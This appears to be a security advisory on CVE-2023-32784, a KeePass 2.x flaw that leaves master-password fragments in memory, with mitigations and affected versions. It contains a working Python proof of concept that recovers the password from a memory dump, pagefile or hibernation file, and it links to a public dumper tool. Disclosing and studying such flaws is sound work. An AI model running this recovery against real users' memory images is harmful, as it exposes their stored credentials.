Introduction
KeePass is a popular open-source password manager used by millions of people. In May 2023 a vulnerability was disclosed in KeePass 2.x that allows an attacker who can obtain a memory image from the victim's machine (a dump of the KeePass process, a full RAM capture, or the Windows pagefile or hibernation file) to recover the master password in cleartext, minus its first character. This works even when the KeePass workspace is locked and, for copies in the pagefile or hibernation file, after KeePass has exited. The vulnerability is tracked as CVE-2023-32784; NVD assigns it a CVSS 3.x base score of 7.5 (High).
Vulnerability Details
The root cause is in SecureTextBoxEx, the custom text box KeePass 2.x uses for entering the master password (and other secrets). For every character the user types, a new .NET string is created that holds the bullet characters (●) displayed for the characters already typed, followed by the character just typed. Typing "Password" therefore leaves strings such as ●a, ●●s, ●●●s, ●●●●w, ●●●●●o, ●●●●●●r and ●●●●●●●d behind. .NET strings are immutable and live on the managed heap: KeePass cannot zero them, the garbage collector does not wipe freed memory, and clearing the text box does not remove them.
These leftover strings are not confined to the live process. They are carried into any place the process memory is written: a process dump, a RAM acquisition, the pagefile, or the hibernation file.
Recovering the password from such an image is a matter of string recovery: search the dump for the UTF-16 pattern of one or more bullets followed by a single character and order the hits by bullet count, because the number of bullets gives the character's position in the password. The first keystroke produces no bullet-prefixed string, so the first character cannot be recovered this way, and if the user corrected a typo while entering the password several candidate characters may appear for one position.
An attacker who can read the KeePass process memory, or who obtains a memory image from the machine, can therefore reconstruct the master password. The database does not need to be unlocked at the time: the strings persist after the workspace is locked, and copies in the pagefile or hibernation file can persist after KeePass has exited. Local access (or malware running with local access) is required; the flaw is not remotely exploitable on its own.
Keepass Password Dumper
The keepass-password-dumper project on GitHub provides a proof-of-concept for CVE-2023-32784. Given a memory dump of the KeePass process, it performs the string recovery described above and prints, for each position, the candidate characters it found, with the first character marked as unknown.
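The string-recovery step described in the vulnerability details and performed by the proof of concept, as an added Python example written for this page (it is not the keepass-password-dumper code and not part of KeePass). It constructs a stand-in memory image containing the leftover strings SecureTextBoxEx would leave when "Password" is typed, optionally preceded by a mistyped attempt, then scans the image for the UTF-16LE bullet-prefixed pattern and reconstructs the password with position 1 unknown. The dump bytes and filler are constructed for the example, not taken from a real KeePass process.

```python
from __future__ import annotations

import re
from collections import defaultdict

BULLET = "\u25cf"  # U+25CF BLACK CIRCLE, the masking character SecureTextBoxEx displays
# A leftover string as it sits in memory: a run of UTF-16LE bullets (bytes CF 25)
# followed by one UTF-16LE code unit, the character typed last.
LEFTOVER_RE = re.compile(rb"((?:\xcf\x25)+)(..)", re.DOTALL)


def leftover_strings(typed: str) -> list[str]:
    """Strings left on the managed heap when `typed` is entered character by
    character: for the n-th keystroke (n >= 2), n-1 bullets plus that character.
    The first keystroke leaves no bullet-prefixed string, so it is unrecoverable."""
    return [BULLET * (i - 1) + typed[i - 1] for i in range(2, len(typed) + 1)]


def build_sample_dump(*attempts: str) -> bytes:
    """Constructed stand-in for a memory image (not a real KeePass dump).
    Each string in `attempts` is one thing the user typed into the master
    password box (e.g. a mistyped attempt followed by the corrected one). Every
    leftover string is NUL-terminated like a .NET string and surrounded by ASCII
    filler, which can never contain the CF 25 bullet byte pair."""
    filler = b"FILLER-BYTES-" * 3
    image = bytearray(filler)
    for attempt in attempts:
        for s in leftover_strings(attempt):
            image += s.encode("utf-16-le") + b"\x00\x00" + filler
    return bytes(image)


def recover_candidates(dump: bytes) -> dict[int, set[str]]:
    """String recovery: scan `dump` for bullet-prefixed leftovers and return,
    for each 1-based password position, the set of candidate characters."""
    candidates: dict[int, set[str]] = defaultdict(set)
    for m in LEFTOVER_RE.finditer(dump):
        n_bullets = len(m.group(1)) // 2          # two bytes per UTF-16LE bullet
        try:
            ch = m.group(2).decode("utf-16-le")
        except UnicodeDecodeError:                # lone surrogate half, not a keystroke
            continue
        if not ch.isprintable():                  # NUL terminator or control byte
            continue
        candidates[n_bullets + 1].add(ch)         # n bullets precede position n+1
    return dict(candidates)


def reconstruct(candidates: dict[int, set[str]]) -> str:
    """Render the result the way a dumper would: '?' for position 1 (never
    recoverable), {a|b} where several candidates were found for a position."""
    if not candidates:
        return ""
    parts = ["?"]
    for pos in range(2, max(candidates) + 1):
        opts = sorted(candidates.get(pos, ()))
        if len(opts) == 1:
            parts.append(opts[0])
        elif opts:
            parts.append("{" + "|".join(opts) + "}")
        else:
            parts.append("?")
    return "".join(parts)


if __name__ == "__main__":
    clean = build_sample_dump("Password")
    print(reconstruct(recover_candidates(clean)))       # ?assword
    # The user first typed "Pasw", noticed the typo and retyped: position 4 is ambiguous.
    corrected = build_sample_dump("Pasw", "Password")
    print(reconstruct(recover_candidates(corrected)))   # ?as{s|w}word
```

The same scan can be pointed at a real process dump, pagefile or hibernation file by reading the file into `recover_candidates`; on real images expect extra noise hits, since the regex matches the bullet byte pair at any alignment and the printable filter only drops terminators and control bytes.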
Affected Versions
The vulnerability affects KeePass 2.x versions before 2.54. The fix shipped in KeePass 2.54, released in June 2023. KeePass 1.x does not use SecureTextBoxEx and is not affected, and KeePassXC is a separate code base that does not share this control.
Mitigation Strategies
There are a few things users can do to reduce the risk:
Update to KeePass 2.54 or later. This changes the text box so that new leftover strings are no longer created. Strings left behind by earlier sessions can still sit in the pagefile or hibernation file, so reboot after updating and, if the machine may already have been exposed, overwrite those files (for example by enabling pagefile clearing at shutdown) and change the master password.
Use a strong master password, ideally combined with a key file. This does not defend against CVE-2023-32784 itself, because the password is read from memory rather than guessed, but it remains the main protection against offline attacks on the database file.
Do not rely on the "Lock workspace after inactivity" option as a mitigation: the leftover strings survive locking, so a locked KeePass instance is still exposed. Closing KeePass and rebooting removes them from RAM; full-disk encryption protects the copies in the pagefile and hibernation file from an attacker who takes the disk offline.
Treat any password manager's process memory as sensitive. Other managers such as Bitwarden, LastPass and 1Password do not share this particular bug, but every password manager holds secrets in memory while unlocked, so the underlying control is to keep untrusted code from reading process memory or memory images on the machine.
Conclusion
CVE-2023-32784 is a serious vulnerability: an attacker with a memory image from a victim's machine can recover the master password, which together with a copy of the database file exposes every password stored in it. Users should update to KeePass 2.54 or later and reboot afterwards as soon as possible.
Resources
CVE-2023-32784: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32784
KeePass Password Safe: https://keepass.info/
KeePass Password Dumper: https://github.com/vdohney/keepass-password-dumper
Sample KeePass Memory Dump File: https://drive.google.com/u/0/uc?id=1PcPRiu_L2rYdiS2WwSAKnJL7qwirE4dU&export=download